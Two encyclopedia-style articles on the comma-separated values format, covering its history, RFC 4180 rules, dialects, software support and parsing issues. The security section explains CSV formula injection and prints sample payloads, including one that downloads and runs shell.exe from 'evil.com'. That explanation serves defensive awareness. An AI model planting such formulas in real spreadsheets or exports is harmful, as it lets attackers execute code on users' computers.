Comma-separated values
View on Wikipedia| Comma-separated values | |
|---|---|
| Filename extension | .csv |
| Internet media type | text/csv[1] |
| Uniform Type Identifier (UTI) | public.comma-separated-values-text[2] |
| UTI conformation | public.delimited-values-text[2] |
| Type of format | multi-platform, serial data streams |
| Container for | database information organized as field separated lists |
| Standard | RFC 4180 |
Comma-separated values (CSV) is a text data format that uses commas to separate delimiter-separated values, and newlines to separate records. CSV data stores tabular data (numbers and text) in plain text, where each line typically represents one data record. Each record consists of the same number of fields, and these are separated by commas. If the field delimiter itself may appear within a field, fields can be surrounded with quotation marks.[3] A CSV file is a file containing data in CSV format.
CSV is widespread in data applications and is widely supported by a variety of software, including common spreadsheet applications such as Microsoft Excel.[4] Benefits cited in favor of CSV include human readability and the simplicity of the format.[5]
The CSV file format was formalized in the 2005 technical standard RFC 4180, which defines the MIME type "text/csv" for the handling of text-based fields.
History
[edit]Comma-separated values is a data format that predates personal computers by more than a decade: the IBM Fortran (level H extended) compiler under OS/360 supported list-directed ("free form") input/output, with commas between values, in 1972.[6] List-directed input/output was defined in FORTRAN 77, approved in 1978. List-directed input used commas or spaces for delimiters, so unquoted character strings could not contain commas or spaces.[7]
The term "comma-separated value" and the "CSV" abbreviation were in use by 1983.[8] The manual for the Osborne Executive computer, which bundled the SuperCalc spreadsheet, documents the CSV quoting convention that allows strings to contain embedded commas.[9]
Comma-separated value lists are easier to type (for example into punched cards) than fixed-column-aligned data, and they were less prone to producing incorrect results if a value was punched one column off from its intended location.
Comma separated files are used for the interchange of database information between machines of two different architectures. The plain-text character of CSV files largely avoids incompatibilities such as byte-order and word size. The files are largely human-readable, so it is easier to deal with them in the absence of perfect documentation or communication.[10]
The main standardization initiative—transforming "de facto fuzzy definition" into a more precise and de jure one—was in 2005, with RFC 4180, defining CSV as a MIME Content Type.[11] Later, in 2013, some of RFC 4180's deficiencies were tackled by a W3C recommendation.[12]
In 2014 IETF published RFC 7111 describing the application of URI fragments to CSV documents. RFC 7111 specifies how row, column, and cell ranges can be selected from a CSV document using position indexes.[13]
In 2015 W3C, in an attempt to enhance CSV with formal semantics, publicized the first drafts of recommendations for CSV metadata standards, which began as recommendations in December of the same year.[14]
Specification
[edit]Casually, the term "CSV" might refer to any file that:[1][15]
- Is plain text using a character encoding such as ASCII, various Unicode character encodings (e.g. UTF-8), EBCDIC, or Shift JIS;
- Consists of records (typically one record per line);
- Divided its records into fields separated by a comma;
- Has the same sequence of fields for each record.
The 2005 technical standard RFC 4180 formalizes the CSV file format and defines the MIME type "text/csv" for the handling of text-based fields. However, the interpretation of the text of each field is still application-specific. Files that follow the RFC 4180 standard can simplify CSV exchange and should be widely portable. Among its requirements:
- MS-DOS-style lines that end with (CR/LF) characters (optional for the last line).
- An optional header record (there is no sure way to detect whether it is present, so care is required when importing).
- Each record should contain the same number of comma-separated fields.
- Any field may be quoted (with double quotes).
- Fields containing a line-break, double-quote or commas should be quoted. (If they are not, the file will likely be impossible to process correctly.)
- If double-quotes are used to enclose fields, then a double-quote in a field must be represented by two double-quote characters.
The format can be processed by most programs that claim to read CSV files. The exceptions are (a) programs may not support line-breaks within quoted fields, (b) programs may confuse the optional header with data or interpret the first data line as an optional header, and (c) double-quotes in a field may not be parsed correctly automatically.
In 2011 Open Knowledge Foundation (OKF) and various partners created a data protocols working group, which later evolved into the Frictionless Data initiative. One of the main formats they released was the Tabular Data Package. Tabular Data package was heavily based on CSV, using it as the main data transport format and adding basic type and schema metadata (CSV lacks any type information to distinguish the string "1" from the number 1).[16] The Frictionless Data Initiative has also provided a standard CSV Dialect Description Format for describing different dialects of CSV, for example specifying the field separator or quoting rules.[17]
In 2013 the W3C "CSV on the Web" working group began to specify technologies providing higher interoperability for web applications using CSV or similar formats.[18] The working group completed its work in February 2016 and is officially closed in March 2016 with the release of a set of documents and W3C recommendations[19] for modeling "Tabular Data",[14] and enhancing CSV with metadata and semantics. While the well-formedness of CSV data can readily checked, testing validity and canonical form is less well developed, relative to more precise data formats, such as XML and SQL, which offer richer types and rules-based validation.[20]
Features
[edit]CSV formats are best used to represent sets or sequences of records in which each record has an identical list of fields. This corresponds to a single relation in a relational database, or to data (though not calculations) in a typical spreadsheet.
The format dates back to the early days of business computing and is widely used to pass data between computers with different internal word sizes, data formatting needs, and so forth. For this reason, CSV files are common on all computer platforms.
CSV is a delimited text data format that uses a comma to separate values (many implementations of CSV import/export tools allow other separators to be used; for example, the use of a "Sep=^" row as the first row in a *.csv file will cause Excel to open the file expecting caret "^" to be the separator instead of comma ","). Simple CSV implementations may prohibit field values that contain a comma or other special characters such as newlines. More sophisticated CSV implementations permit them, often by requiring " (double quote) characters around values that contain reserved characters (such as commas, double quotes, or less commonly, newlines). Embedded double quote characters may then be represented by a pair of consecutive double quotes,[21] or by prefixing a double quote with an escape character such as a backslash (for example in Sybase Central).
CSV formats are not limited to a particular character set.[1] They work just as well with Unicode in encodings such as UTF-8 or UTF-16 as they do with ASCII (although particular programs that support CSV may have their own limitations). CSV data normally will even survive naïve translation from one character set to another (unlike nearly all proprietary data formats). CSV does not, however, provide any way to indicate what character set is in use, so that must be communicated separately, or determined at the receiving end (if possible).
Applications
[edit]CSV is a common data exchange format that is widely supported by consumer, business, and scientific applications. Among its most common uses is moving tabular data[22][23] between programs that natively operate on incompatible (often proprietary or undocumented) formats.[1] For example, a user may need to transfer information from a database program that stores data in a proprietary format, to a spreadsheet that uses a completely different format. Most database programs can export data as CSV. Most spreadsheet programs can read CSV data, allowing CSV to be used as an intermediate format when transferring data from a database to a spreadsheet. Every major ecommerce platform provides support for exporting data as a CSV file.[24]
CSV is also used for storing data. Common data science tools such as Pandas include the option to export data to CSV for long-term storage.[25] Benefits of CSV for data storage include the simplicity of CSV makes parsing and creating CSV files easy to implement and fast compared to other data formats, human readability making editing or fixing data simpler,[26] and high compressibility leading to smaller data files.[27] Alternatively, CSV does not support more complex data relations and makes no distinction between null and empty values, and in applications where these features are needed other formats are preferred.
More than 200 local, regional, and national data portals, such as those of the UK government and the European Commission, use CSV files with standardized data catalogs.[28]
Some applications use CSV as a data interchange format to enhance its interoperability, exporting and importing CSV. Others use CSV as an internal format. CSV is supported by almost all spreadsheets and database management systems.
Spreadsheets including Apple Numbers, LibreOffice Calc, and Apache OpenOffice Calc. support reading CSV files. Microsoft Excel also supports a dialect of CSV with restrictions in comparison to other spreadsheet software (e.g., as of 2019[update] Excel still cannot export CSV files in the commonly used UTF-8 character encoding, and separator is not enforced to be the comma). LibreOffice Calc CSV importer is actually a more generic delimited text importer, supporting multiple separators at the same time as well as field trimming.
Various relational databases support saving query results to a CSV file. PostgreSQL provides the COPY command, which allows for both saving and loading data to and from a file. COPY (SELECT * FROM articles) TO '/home/wikipedia/file.csv' (FORMAT csv) saves the content of a table articles to a file called /home/wikipedia/file.csv.[29] Some relational databases, when using standard SQL, offer foreign-data wrapper (FDW). For example, PostgreSQL offers the CREATE FOREIGN TABLE[30] and CREATE EXTENSION file_fdw[31] commands to configure any variant of CSV. Databases like Apache Hive offer the option to express CSV or .csv.gz as an internal table format.
Programs that work with CSV may have limits on the maximum number of rows CSV files can have. Examples include Microsoft Excel (1,048,576 rows), Apple Numbers (1,000,000 rows), Google Sheets (10,000,000 cells), and OpenOffice and LibreOffice (1,048,576 rows).[32]
See also
[edit]- Comparison of data-serialization formats
- Delimiter collision – Character(s) for specifying the boundary between regions of data
- Flat-file database – Database stored as flat data
References
[edit]- ^ a b c d Shafranovich, Y. (October 2005). Common Format and MIME Type for CSV Files. IETF. p. 1. doi:10.17487/RFC4180. RFC 4180.
- ^ a b "commaSeparatedText". Apple Developer Documentation: Uniform Type Identifiers. Apple Inc. Archived from the original on 2023-05-22. Retrieved 2023-05-22.
- ^ "CSV Comma Separated Value File Format - How To - Creativyst - Explored,Designed,Delivered.(sm)". Creativyst Software. Archived from the original on 1 April 2021. Retrieved 22 August 2023.
- ^ "Import or export text (.txt or .csv) files". Microsoft Support. Retrieved 2023-08-16.
- ^ "What is a CSV file: A comprehensive guide". flatfile.com. Retrieved 2024-10-28.
- ^ IBM FORTRAN Program Products for OS and the CMS Component of VM/370 General Information (PDF) (first ed.), July 1972, p. 17, GC28-6884-0, archived (PDF) from the original on March 4, 2016, retrieved February 5, 2016,
For users familiar with the predecessor FORTRAN IV G and H processors, these are the major new language capabilities
- ^ "List-Directed I/O", Fortran 77 Language Reference, Oracle, archived from the original on 2021-02-26, retrieved 2012-10-26
- ^ "SuperCalc², spreadsheet package for IBM, CP/M". Retrieved December 11, 2017.
- ^ "Comma-Separated-Value Format File Structure". 1983. Retrieved December 11, 2017.
- ^ "CSV, Comma Separated Values (RFC 4180)". Library of Congress. Retrieved September 22, 2025.
- ^ Common Format and MIME Type for Comma-Separated Values (CSV) Files. doi:10.17487/RFC4180. RFC 4180. Retrieved December 22, 2020.
- ^ See sparql11-results-csv-tsv, the first W3C recommendation scoped in CSV and filling some of RFC 4180's deficiencies.
- ^ URI Fragment Identifiers for the text/csv Media Type. doi:10.17487/RFC7111. RFC 7111. Retrieved December 22, 2020.
- ^ a b "Model for Tabular Data and Metadata on the Web". 17 December 2015. Retrieved March 23, 2016. (W3C Recommendation)
- ^ "Comma Separated Values (CSV) Standard File Format". Edoceo, Inc. Archived from the original on July 14, 2020. Retrieved June 4, 2014.
- ^ "Tabular Data Package". Frictionless Data Specs.
- ^ "CSV Dialect". Frictionless Data Specs.
- ^ "CSV on the Web Working Group". W3C CSV WG. 2013. Retrieved 2015-04-22.
- ^ "CSV on the Web Repository". GitHub. (on GitHub)
- ^ "Rules Or Schemas". CsvPath Project. 2024. Retrieved 2025-02-13.
- ^ *Creativyst (2010), How To: The Comma Separated Value (CSV) File Format, creativyst.com, archived from the original on April 4, 2021, retrieved May 24, 2010
- ^ "CSV - Comma Separated Values". Archived from the original on 2021-03-07. Retrieved 2017-12-02.
- ^ "CSV Files". Archived from the original on April 30, 2021. Retrieved June 4, 2014.
- ^ "CSV Supported Ecommerce Platforms". RFM Calc. Retrieved 2025-03-09.
- ^ "pandas.DataFrame.to_csv — pandas 2.0.3 documentation". pandas.pydata.org. Retrieved 2023-08-16.
- ^ "CSV Format: History, Advantages and Why It Is Still Popular". ByteScout. 2021-09-15. Retrieved 2023-08-16.
- ^ "Comparison of different file formats in Big Data". www.adaltas.com. 2020-07-23. Retrieved 2023-08-16.
- ^ Mahmud, S M Hasan; Hossin, Md Altab; Jahan, Hosney; Noori, Sheak Rashed Haider; Bhuiyan, Touhid (2018). CSV-ANNOTATE: Generate annotated tables from CSV file. 2018 International Conference on Artificial Intelligence and Big Data (ICAIBD). IEEE. pp. 71–75. doi:10.1109/ICAIBD.2018.8396169. ISBN 978-1-5386-6987-7.
- ^ "Documentation: 14: COPY". PostgreSQL. Retrieved 2024-05-12.
- ^ "Documentation: 14: F.35. postgres_fdw". PostgreSQL. 2022-02-10. Retrieved 2022-03-04.
- ^ "Documentation: 14: F.14. file_fdw". PostgreSQL. 2022-02-10. Retrieved 2022-03-04.
- ^ "Understanding CSV and row limits". Archived from the original on January 15, 2021. Retrieved Feb 28, 2021.
Further reading
[edit]- "IBM DB2 Administration Guide - LOAD, IMPORT, and EXPORT File Formats". IBM. Archived from the original on 2016-12-13. Retrieved 2016-12-12. (Has file descriptions of delimited ASCII (.DEL) (including comma- and semicolon-separated) and non-delimited ASCII (.ASC) files for data transfer.)
Comma-separated values
View on Grokipedia,) and records are delimited by line breaks, typically CRLF (carriage return followed by line feed).[1] The format supports an optional header row as the first line to identify field names, and fields containing commas, line breaks, or double quotes must be enclosed in double quotes, with internal double quotes escaped by doubling them.[1] Standardized in RFC 4180 in October 2005, CSV was developed to formalize a long-existing convention for data exchange between spreadsheet programs and other applications, with the specification also registering the MIME type text/csv for consistent handling in internet protocols.[1][2]
Prior to formal standardization, the CSV format had been in use for decades as a simple, human-readable method for representing structured data in plain text, originating as an early approach to data portability in computing environments like early database and spreadsheet systems.[2] Despite variations in implementation across tools—such as differing handling of delimiters, quoting, or encoding—RFC 4180 provides a common baseline, requiring each record to have the same number of fields and restricting characters to printable ASCII excluding certain control codes.[1][3] This simplicity has made CSV ubiquitous for importing and exporting data in software like Microsoft Excel, databases such as MySQL and PostgreSQL, and statistical tools, with institutions like the U.S. Library of Congress holding over 840,000 CSV files in their collections as of 2024 for preservation purposes.[3]
CSV's advantages include its lightweight nature, platform independence, and ease of parsing without specialized software, though it lacks built-in support for data types, metadata, or complex structures, often necessitating external documentation for full interpretation.[3] Recommended by bodies like the UK Open Standards Board for government tabular data publication, the format remains a de facto standard for open data initiatives, such as those on Data.gov, due to its high adoption and transparency.[4][3] While alternatives like JSON or XML offer more features for hierarchical data, CSV's efficiency for flat, tabular datasets ensures its continued prominence in data science, reporting, and interoperability.[3]
Overview
Definition
Comma-Separated Values (CSV) is a delimited text file format designed for storing and exchanging tabular data in a simple, plain-text structure. In this format, each line represents a single row of the table, with individual fields or values within the row separated by commas, and rows delimited by line breaks such as carriage return and line feed (CRLF). This approach allows CSV files to represent structured data like spreadsheets without relying on binary or proprietary encodings, making them widely portable across different systems and applications.[1] The primary purpose of CSV is to facilitate straightforward data interchange between diverse software, including spreadsheet programs, databases, and data analysis tools, while maintaining human readability in any standard text editor. By using only basic delimiters and line breaks, CSV avoids the need for specialized software to view or edit the content, promoting interoperability in data processing workflows. This simplicity has made it a de facto standard for data export and import in fields ranging from business analytics to scientific research.[1][5] CSV supports both ASCII and Unicode characters, with the format defined in terms of the US-ASCII character set by default, though files can be encoded in UTF-8 or other schemes to accommodate international text; however, the CSV specification includes no built-in mechanism for declaring the character encoding, which must be handled externally via MIME types or file metadata. For illustration, a basic CSV file might begin with a header row such as:Name,Age,City
Alice,30,New York
Bob,25,Los Angeles
This example demonstrates how the format encodes a simple table where the first line defines column names, and subsequent lines provide corresponding values.[1]
Basic Structure
Comma-separated values (CSV) files represent tabular data in plain text format, where each line corresponds to a record and fields within records are delimited by commas. The primary field delimiter is the comma character (,), which separates individual values in a row. Records are separated by line breaks, specifically the carriage return followed by line feed (CRLF, or %x0D %x0A in hexadecimal notation), though some implementations accept LF alone.[6]
A CSV file may include an optional header row as the first line, containing column names in the same format as data records; applications typically interpret this row as headers to label fields. All lines in the file should contain the same number of fields to maintain structural integrity, and spaces adjacent to delimiters are considered part of the field values rather than whitespace to trim. While the final record does not require a terminating line break, consistent use of the same line terminator throughout the file is recommended for compatibility across systems.[6]
For illustration, a simple CSV file without quoted fields might structure as follows, representing fruit inventory data:
fruit,color,quantity
apple,red,1
[banana](/page/Banana),yellow,2
This example shows a header row followed by two data records, each terminated by a newline.[6]
History
Origins
The origins of comma-separated values (CSV) trace back to the early 1970s in mainframe computing environments, where the need for simple, human-readable data interchange formats emerged alongside the growth of programming languages and data processing tools. The first documented use of a CSV-like mechanism appeared in 1972 with the IBM FORTRAN IV (H Extended) compiler for the OS/360 operating system. This compiler introduced list-directed input/output, a feature that allowed data entries to be separated by blanks or commas in free-form input, with successive commas indicating omitted values—for example, "5.,33.44,5.E-9/" could parse multiple numeric fields without rigid formatting. This capability simplified data entry for scientific and engineering computations on IBM System/360 mainframes, marking an early step toward delimited text formats for tabular data transfer.[7] During the late 1970s and early 1980s, CSV-like formats spread informally through the burgeoning personal computing and spreadsheet software ecosystems, driven by the demand for portable data exchange between applications. VisiCalc, released in 1979 as the first electronic spreadsheet for the Apple II, exemplified this trend by incorporating comma-separated lists in its command syntax and function arguments, such as in expressions like "@SUM(A1,B1,C1)" for aggregating values across cells. This usage facilitated basic data manipulation and import/export operations, though VisiCalc primarily relied on its proprietary DIF (Data Interchange Format) for file storage. Similar ad hoc delimited formats appeared in early database tools and word processors, enabling users to transfer tabular data via text files without specialized hardware, but implementations remained vendor-specific and prone to compatibility issues. The explicit term "comma-separated values" and its abbreviation "CSV" emerged by 1983, coinciding with the rise of portable computers and bundled productivity software. The Osborne Executive, a Z80-based luggable computer released that year, included SuperCalc—a popular spreadsheet program from Sorcim—as standard software. The Osborne Executive Reference Guide documented CSV as a file format for exporting spreadsheet data, using commas to delimit fields and newlines for records, which allowed seamless transfer to other programs like word processors or databases. This naming formalized the concept within microcomputer documentation, reflecting its growing utility for non-programmers handling business and financial data.[8] Pre-standardization implementations during this period exhibited significant variations, particularly in handling special cases that could disrupt parsing. For instance, early tools like those in FORTRAN and SuperCalc often lacked consistent quoting conventions, leaving fields containing embedded commas, quotes, or line breaks unescaped or ambiguously delimited. Without uniform rules for enclosures or escapes, data interchange frequently required manual adjustments, highlighting the format's informal, evolving nature before broader adoption.[7]Standardization
The standardization of comma-separated values (CSV) began in earnest in the early 21st century, as informal practices from earlier computing eras gave way to formal specifications aimed at ensuring interoperability across systems.[1] In October 2005, the Internet Engineering Task Force (IETF) published RFC 4180, titled "Common Format and MIME Type for Comma-Separated Values (CSV) Files," which codified CSV as an informal standard by documenting its common format and registering the "text/csv" MIME type in accordance with RFC 2048.[1] This document outlined specific rules for CSV files, including requirements for headers, field delimiters, quoting mechanisms, and line endings, to promote consistent parsing and generation of CSV data without prescribing a rigid syntax.[1] Building on this foundation, the Frictionless Data Initiative, a project of the Open Knowledge Foundation, introduced the Table Schema specification on November 12, 2012, providing a JSON-based format for declaring schemas that add semantic metadata to tabular data, particularly CSV files.[9] Table Schema enables the definition of fields, data types, constraints, and foreign keys, facilitating validation, documentation, and enhanced interoperability for CSV datasets in open data ecosystems.[9] In January 2014, the IETF extended CSV support through RFC 7111, "URI Fragment Identifiers for the text/csv Media Type," which defined mechanisms for referencing specific parts of CSV entities using URI fragments, such as rows, columns, or cells, to enable precise linking and subset extraction.[10] Finally, in December 2015, the World Wide Web Consortium (W3C) released a set of recommendations under the "CSV on the Web" initiative, including the "Model for Tabular Data and Metadata on the Web" and a associated metadata vocabulary, to standardize the annotation and conversion of CSV files into richer web-accessible formats like RDF. These W3C standards emphasized integrating CSV with web architectures, supporting metadata for tabular data to improve discoverability and linkage on the Semantic Web.Technical Specification
Core Rules
The core rules for comma-separated values (CSV) are defined in RFC 4180, which provides a minimal specification for the format to ensure interoperability in data interchange.[1] A CSV file consists of one or more records, each represented as a single line delimited by a line break (CRLF); the final record may omit the line terminator. Fields within a record are delimited by commas, with each record having the same number of fields to maintain structural consistency; empty fields are indicated by two consecutive commas, as in the examplename,age,city followed by a record like John,,New York representing an empty age field, or ,, for two leading empty fields in a three-field record.[1]
The first line of a CSV file, if present, serves as a header row containing field names, which subsequent data records align with positionally; this header is optional but recommended for clarity in identifying columns. For instance, a simple file might begin with ID,Name,Department on the first line, followed by data lines like 1,Alice,Engineering.[1]
CSV has no built-in schema or data type enforcement, treating all field content as unstructured strings by default, which allows flexibility but requires external validation for semantic integrity.[1]
Handling Special Characters
In comma-separated values (CSV) files, fields that contain special characters such as commas, double quotes, or line breaks (CRLF) should be enclosed in double quotes to prevent misinterpretation during parsing.[1] This quoting mechanism ensures that the delimiter comma is not confused with embedded commas within the data, allowing for the accurate representation of complex text values.[1] To handle double quotes appearing inside a quoted field, the specification requires that such internal quotes be escaped by doubling them—replacing a single double quote with two consecutive double quotes.[1] For instance, a field containing the text "He said 'hello'" would be represented as"He said ""hello"" within the CSV record.[1] This escaping rule applies only within quoted fields and preserves the original data without introducing additional delimiters.[1]
Quoting is optional for fields that do not contain commas, double quotes, or line breaks, as unquoted fields must consist solely of non-special characters to avoid parsing errors.[1] However, for consistency and to mitigate potential issues in varied implementations, many applications quote all fields regardless.[1] An example of a CSV record handling an embedded comma and a line break is:
"Smith, John",25,"New York, NY
with a line break"
Here, the first and third fields are quoted to enclose the comma in the name and the line break in the address, respectively.[1] This approach aligns with the formal grammar defined in the specification, where fields are either escaped (quoted with possible internal escapes) or non-escaped (plain text without special characters).[1]
Variants and Dialects
Alternative Delimiters
While the comma serves as the standard delimiter for comma-separated values (CSV) files as defined in RFC 4180, various alternative delimiters are employed to address regional conventions, data content conflicts, and specific application needs.[11] In many Western European locales, where the comma is conventionally used as a decimal separator—for instance, representing π as 3,14—the semicolon (;) is adopted as the field delimiter to prevent ambiguity in numerical data.[12] This practice aligns with Excel's handling of CSV files in those regions and is implemented in tools like R's write.csv2 function, which pairs the semicolon delimiter with comma-based decimals.[13] Tab-separated values (TSV) represent a precise variant of delimited files, utilizing the horizontal tab character (\t) as the separator instead of the comma.[14] TSV is favored in scenarios where tabs are less likely to occur within field content, thereby minimizing the need for quoting and simplifying parsing compared to CSV.[15] Custom dialects often incorporate the pipe character (|) as a delimiter, particularly in finance and related sectors where data may frequently contain commas, semicolons, or tabs.[16] This choice enhances readability and reduces errors in environments requiring robust separation of fields like transaction records or invoice details. Locale-specific adaptations further influence delimiter selection, with applications such as Microsoft Excel automatically applying the appropriate separator—such as a semicolon in European settings—based on Windows regional configurations to maintain compatibility across diverse user environments.[17]Extensions and Metadata
To enhance the usability of comma-separated values (CSV) files beyond their basic structure, various extensions introduce metadata for describing data semantics, validation rules, and relationships. The W3C's Metadata Vocabulary for Tabular Data, published as a recommendation in 2015, defines a JSON-based format to annotate CSV and other tabular data with information such as field types (e.g., string, integer, date), constraints (e.g., minimum or maximum values), and foreign keys to link tables.[18] This vocabulary allows metadata to be provided in a separate sidecar file, enabling processors to validate data types and infer relationships without relying solely on the raw CSV content.[18] Similarly, the Frictionless Data initiative's Tabular Data Package specification, developed since 2011, extends CSV by pairing it with a JSON descriptor file that outlines the schema, including field names, types, formats, and constraints.[19] This approach uses a "sidecar" JSON file to define the structure of the accompanying CSV, promoting interoperability and automated validation in data pipelines.[9] For instance, the specification supports detailed type definitions, such as specifying a date field with a format like "YYYY-MM-DD" to ensure consistent parsing across tools.[9] Within the CSV on the Web (CSVW) framework, dialect descriptions provide programmatic metadata to customize parsing rules, including delimiters, quoting conventions, and header presence, while integrating with the broader metadata vocabulary for semantic annotations.[18] An example metadata file for a CSV containing dates might include a JSON object like{ "dc:title": "Sales Data", "tableSchema": { "columns": [{ "name": "sale_date", "type": "date", "format": "YYYY-MM-DD" }] } }, which instructs processors to interpret the "sale_date" column as dates in ISO 8601 format, preventing misinterpretation during import.[18]
Usage and Applications
Data Interchange
Comma-separated values (CSV) files serve as a fundamental medium for data interchange due to their simplicity and broad compatibility, enabling seamless transfer of tabular data between diverse systems without requiring specialized software. This format is particularly valued in workflows involving the export of structured data from relational databases, such as SQL-based systems, where queries generate CSV outputs for analysis or migration. For instance, database management systems like MySQL support direct export to CSV using commands like SELECT INTO OUTFILE, facilitating the movement of large datasets to spreadsheet applications for further manipulation. Conversely, spreadsheets such as Microsoft Excel or Google Sheets can import CSV files to populate tables, allowing users to perform ad-hoc analysis on database-derived data. This bidirectional flow underscores CSV's role in bridging enterprise data storage with end-user tools, as it preserves tabular structure while remaining lightweight and human-readable. In e-commerce, CSV excels in managing product catalogs by supporting bulk import and export operations across platforms. Systems like WooCommerce enable merchants to upload CSV files containing product details—including SKUs, prices, descriptions, and inventory levels—to populate online stores efficiently, often handling thousands of items in a single operation. Similarly, Salesforce B2C Commerce utilizes CSV for catalog synchronization, allowing businesses to update product listings across multiple channels without manual entry. This interchange capability reduces operational overhead in dynamic retail environments, where frequent updates to catalogs are essential for maintaining accurate inventory and pricing. Government portals leverage CSV for disseminating open data, promoting transparency and public access to information. Platforms like Data.gov mandate machine-readable formats for federal datasets, with CSV being a primary choice for tabular releases such as economic indicators or public health statistics, downloadable directly from agency repositories. This format's ubiquity ensures compatibility with analysis tools, enabling researchers and citizens to integrate government data into local workflows without format conversion. Internationally, similar portals, including those cataloged by Data.gov, provide CSV exports to standardize open data sharing across jurisdictions. CSV integrates into web-based applications for bulk data uploads, particularly in email marketing where contact lists are exchanged via APIs or forms. Tools like Klaviyo allow users to import CSV files containing subscriber emails, names, and custom properties to segment audiences and personalize campaigns at scale. In API-driven scenarios, such as Adobe Sign's bulk send feature, CSV files define recipient details for automated document distribution, streamlining high-volume communications. This application extends to contact management in customer relationship systems, where CSV uploads facilitate rapid population of databases from external sources. In modern machine learning pipelines, CSV facilitates dataset sharing for training and evaluation, serving as a portable format for tabular data exchange among collaborators. Azure Machine Learning, for example, uses CSV files to upload and explore datasets like credit card transaction records, enabling preprocessing steps within cloud-based workflows. Researchers often export training data from databases or experiments into CSV for distribution via repositories, ensuring compatibility with libraries like pandas in Python for ingestion into models. This practice supports collaborative projects by allowing datasets to be versioned and shared without proprietary formats, though it requires attention to encoding for large-scale transfers.Software Support
Spreadsheet software provides robust support for CSV files, enabling users to import, edit, and export data in this format. Microsoft Excel, a widely used tool, supports up to 1,048,576 rows and 16,384 columns per worksheet when handling CSV files, a limit consistent across versions including Excel 2016 and later.[20] Additionally, Excel introduced native support for opening and saving CSV files in UTF-8 encoding starting with the 2019 version, improving handling of international characters without requiring manual encoding adjustments.[21] Google Sheets, another popular option, accommodates up to 10 million cells across its spreadsheets when importing CSV data, with no strict row limit but constraints based on total cell usage to maintain performance.[22] In programming environments, libraries facilitate efficient reading, writing, and manipulation of CSV files. Python's built-in csv module, part of the standard library since version 2.3, offers functions like csv.reader() and csv.writer() for parsing and generating CSV data, supporting dialects for varying formats and handling quoting and escaping automatically.[2] For more advanced data analysis, the Pandas library provides high-level functions such as pd.read_csv() and to_csv(), which integrate seamlessly with DataFrames for operations like filtering, aggregation, and large-scale processing, making it a staple in data science workflows.[23] In Java, the OpenCSV library serves as a comprehensive parser, enabling bean mapping, custom delimiters, and error handling for both reading from and writing to CSV files, with versions up to 5.x supporting modern Java features like streams.[24] Database systems integrate CSV support for bulk data operations, streamlining import and export processes. PostgreSQL's COPY command allows efficient loading of CSV data into tables using syntax like COPY table_name FROM 'file.csv' WITH (FORMAT CSV, HEADER true), which handles quoting, escaping, and delimiters while supporting large-scale imports without row limits beyond system resources.[25] Similarly, MySQL's LOAD DATA INFILE statement facilitates bulk CSV ingestion with options for field terminators and enclosures, as in LOAD DATA INFILE 'file.csv' INTO TABLE table_name FIELDS TERMINATED BY ',' ENCLOSED BY '"', enabling high-performance data transfer for databases handling millions of records.[26] Cloud services have increasingly incorporated CSV handling for scalable data storage and processing as of 2025. Amazon Web Services (AWS) S3 supports CSV files as a core component of data lakes, allowing storage of semi-structured data alongside tools like AWS Glue for cataloging and querying, which facilitates integration with analytics services for petabyte-scale CSV-based workflows.[27]Challenges and Limitations
Parsing Issues
One common parsing issue with CSV files arises from inconsistent quoting practices, which can cause field misalignment and incorrect record boundaries. For example, if a field contains an unescaped newline character without proper quoting, parsers may interpret it as a new record separator, fragmenting a single logical row across multiple lines. The CSV specification requires that fields containing line breaks, commas, or double quotes be enclosed in double quotes, with internal double quotes escaped by doubling them (e.g.,"field with ""quote"""), but many file generators—such as certain spreadsheet applications—omit quotes for fields without commas, leading to misalignment when newlines or quotes appear unexpectedly.[1][28] This deviation from the rules outlined in RFC 4180 often results in errors during import into databases or analysis tools, where unquoted newlines split records erroneously.[1]
Encoding mismatches further complicate CSV parsing, as the format lacks a mandated character encoding, allowing files to be produced in diverse schemes like UTF-8 or legacy codepages such as Windows-1252 (CP1252). When a parser defaults to an incorrect encoding, non-ASCII characters—such as accented letters or symbols in international data—can become corrupted, appearing as mojibake (garbled text) or replacement characters like question marks. For instance, a UTF-8 encoded file containing "café" read as CP1252 might render as "café," distorting the data integrity.[28] This issue is exacerbated by tools like Microsoft Excel, which historically save CSVs using system-specific codepages rather than UTF-8, and by the optional Byte Order Mark (BOM) in Unicode files, whose handling varies across parsers.[28] To mitigate this, files should be explicitly encoded in UTF-8 without a BOM for broad compatibility, and parsers should allow specification of the encoding parameter.[2]
Dialect detection failures in parsing tools add another layer of difficulty, as CSV variants often use non-standard delimiters (e.g., semicolons or tabs instead of commas) or inconsistent header presence, requiring manual configuration to avoid misinterpretation. Automated detection can falter on ambiguous files, such as those with quoted fields mimicking delimiters or irregular row lengths, leading to incorrect column mapping. Best practices recommend employing standardized parsers with built-in detection mechanisms, such as Python's csv.Sniffer class, which analyzes a file sample to infer the dialect—including delimiter, quoting style, and header row—using heuristics like sampling up to 1024 bytes and checking for numeric versus string patterns in potential headers.[29] Despite its utility, csv.Sniffer may require fallback to manual dialect specification (e.g., via csv.register_dialect) for edge cases like embedded quotes or multiline fields.[2]
Security Concerns
CSV injection, also known as formula injection, poses a significant security risk in comma-separated values (CSV) files when untrusted data is embedded without proper sanitization, allowing malicious formulas to execute upon import into spreadsheet applications like Microsoft Excel or LibreOffice Calc.[30] Attackers exploit this by injecting payloads starting with characters such as=, +, -, or @, which spreadsheet software interprets as executable formulas rather than plain text.[31] For instance, a field containing =CMD|' /C calc'!A0 could launch the Windows calculator when the CSV is opened, or more dangerously, =shell|'Invoke-WebRequest "http://evil.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1 might download and execute remote malware.[32]
The absence of inherent schema validation in the CSV format exacerbates these vulnerabilities, as it permits unexpected data types or structures to be inserted without enforcement, potentially leading to unintended formula execution or data corruption during processing.[33] Without predefined rules for field contents, applications exporting CSV files from user inputs—common in data interchange scenarios—may inadvertently propagate malicious elements, enabling exploits like data exfiltration or system compromise when files are shared or downloaded.[30] This lack of validation also heightens risks in environments where CSV files handle sensitive information, as attackers can manipulate inputs to bypass basic security checks.[31]
To mitigate CSV injection, developers should sanitize inputs by detecting and neutralizing dangerous characters (e.g., via regex patterns like /^[=+\-@]/) and prefixing suspect fields with a single quote (') to force text interpretation, or wrapping all fields in double quotes while escaping internal quotes.[32] Employing secure parsers that validate data types and reject formula-like strings, combined with server-side input filtering, is essential; additionally, modern spreadsheet tools like Excel include protections such as prompts for external content and disabled dynamic data exchange (DDE) by default since 2018 updates, though users must remain vigilant against renaming files to bypass warnings.[33] Organizations are advised to avoid exporting untrusted data directly to CSV and instead use formats with built-in validation or implement logging to track potential injection attempts.[34]
